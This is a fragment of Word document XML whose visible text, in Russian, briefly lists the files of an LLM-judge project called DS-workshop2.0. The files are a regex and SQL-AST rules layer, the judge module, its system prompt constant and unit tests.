    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DS-workshop2.0 (целевая система LLM-судьи)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внутренний материал команды:</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app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — детерминированный layer (regex + sqlglot AST), 9 классов уязвимостей.</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app/services/judge/llm_judge.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — LLM-судья (OpenAI-совместимый).</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app/services/judge/prompts.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JUDGE_SYSTEM_PROMPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app/tests/services/test_judge.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 15 unit-тестов с golden labels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="200"/>
      </w:pP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См. [[reference-ds-workshop-repo]] для actionable cross-reference.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30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:before="220"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="18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2026-05-24T16:37:06.930Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T16:37:06.942Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>